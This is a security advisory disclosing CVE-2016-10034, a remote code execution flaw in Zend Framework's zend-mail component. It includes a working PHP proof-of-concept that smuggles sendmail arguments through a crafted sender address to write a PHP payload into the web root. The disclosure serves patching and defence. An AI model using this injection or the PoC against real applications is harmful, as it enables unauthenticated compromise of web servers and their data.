__                     __   __  __           __                 
   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  

 <-- BACK TO legalhackers.com 

Follow @dawid_golunski ============================================ - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - CVE-2016-10034 - Release date: 30.12.2016 - Last revision: 30.12.2016 - Revision 1.0 - Severity: Critical ============================================= I. VULNERABILITY ------------------------- Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034) zend-mail < 2.4.11 zend-mail < 2.7.2 II. BACKGROUND ------------------------- "Zend Framework is a collection of professional PHP packages with more than 95 million installations. It can be used to develop web applications and services using PHP 5.6+, and provides 100% object-oriented code using a broad spectrum of language features. Zend Framework 3 evolved from both Zend Framework 2 and 1; cumulatively, the previous versions were downloaded more than 15 million times. The principal sponsor of Zend Framework is Zend, a Rogue Wave Company, but many others have contributed components or significant features to the framework. Companies such as Google, Microsoft, and StrikeIron have partnered with Zend to provide interfaces to web services and other technologies they wish to make available to ZF developers." https://framework.zend.com/about https://github.com/zendframework/zendframework III. INTRODUCTION ------------------------- An independent research uncovered a critical vulnerability in zend-mail, a Zend Framework's component that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the zend-mail class. Note: This advisory is limited. Remaining attack vectors/exploits will be disclosed at a later date to allow more time for patching. IV. DESCRIPTION ------------------------- zend-mail component of Zend Framework, suffers from the same vulnerability as the ones disclosed in PHPMailer and SwiftMailer: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html If a web application based on Zend Framework passes an untrusted input to setFrom() function of the zend-mail's Sendmail transport, an attacker could inject additional parameters to Sendmail program. By injecting an extra sequence of \" after the first argument, the following email: "Attacker \" -Param2 -Param3"@test.com when passed to zend-mail's Sendmail transport (and eventually to mail()) function would cause sendmail to execute with: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fAttacker\] Arg no. 4 == [-Param2] Arg no. 5 == [-Param3"@test.com] Which as can be seen would inject additional parameters of 4 & 5 to sendmail. Attackers can exploit this to achieve code execution as shown in the PoC below. V. PROOF OF CONCEPT EXPLOIT ------------------------- <?php /* Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034) zend-mail < 2.4.11 zend-mail < 2.7.2 Discovered/Coded by: Dawid Golunski https://legalhackers.com Full Advisory URL: http://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html Video PoC https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html Follow the feed for updates: https://twitter.com/dawid_golunski A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-r] Arg no. 4 == [attacker\] Arg no. 5 == [-oQ/tmp/] Arg no. 6 == [-X/var/www/cache/phpcode.php] Arg no. 7 == ["@email.com] which will write the transfer log (-X) into /var/www/cache/phpcode.php file. Note /var/www/cache must be writable by www-data web user. The resulting file will contain the payload passed in the body of the msg: 09607 <<< Content-Type: text/html; charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo(); ?> 09607 <<< 09607 <<< 09607 <<< See the full advisory URL for the exploit details. */ // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form with sender/body fields $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; // encoded phpinfo() php code $msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg=="); // ------------------ // mail() param injection via the vulnerability in zend-mail chdir(dirname(__DIR__)); include 'vendor/Zend/Loader/AutoloaderFactory.php'; Zend\Loader\AutoloaderFactory::factory(array( 'Zend\Loader\StandardAutoloader' => array( 'autoregister_zf' => true ) )); Zend\Mvc\Application::init(require 'config/application.php')->run(); $message = new \Zend\Mail\Message(); $message->setBody($msg_body); $message->setFrom($email_from, 'Attacker'); $message->addTo('support@localhost', 'Support'); $message->setSubject('Zend PoC'); $transport = new \Zend\Mail\Transport\Sendmail(); $transport->send($message); ~~~~~~~~~~~ More advanced exploit targetting a contact form can be found at: https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py Video PoC: ~~~~~~~~~~~~~ https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html VI. BUSINESS IMPACT ------------------------- A successful exploitation could let remote attackers to gain access to the target server in the context of the web server account which could lead to a full compromise of the web application. VII. SYSTEMS AFFECTED ------------------------- The patch resolving the vulnerability is available in: zend-mail, starting in version 2.7.2 zend-mail, 2.4.11 Zend Framework, 2.4.11 VIII. SOLUTION / VENDOR RESPONSE ------------------------- Update to the latest versions that contain the patch. https://framework.zend.com/security/advisory/ZF2016-04 IX. REFERENCES ------------------------- https://legalhackers.com This / CVE-2016-10034 advisory URL: https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html Video PoC exploit: https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html https://www.youtube.com/watch?v=xyYMYvT2bx8 Exploit code: The simple PoC shown above is available here: https://legalhackers.com/exploits/CVE-2016-10034/zend-mail_PoC_RCE_Exploit.txt Combined exploit code for multiple targets: https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py Other exploits with other attack vectors will be disclosed at a later date to allow more time for patching. The previously undisclosed techniques and exploitation vectors will be described in a security white-paper at: https://legalhackers.com/papers/Pwning-PHP-mail-func-For-Fun-And-RCE-New-Exploit-Techniques-Vectors.html CVE-2016-10034 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10034 Vendor site: https://framework.zend.com Related vulnerabilities (found in PHPMailer & SwiftMailer): https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com Thanks to Beyond Security for help with the disclosure XI. REVISION HISTORY ------------------------- 30.12.2016 - Limited advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. Follow @dawid_golunski <-- BACK TO legalhackers.com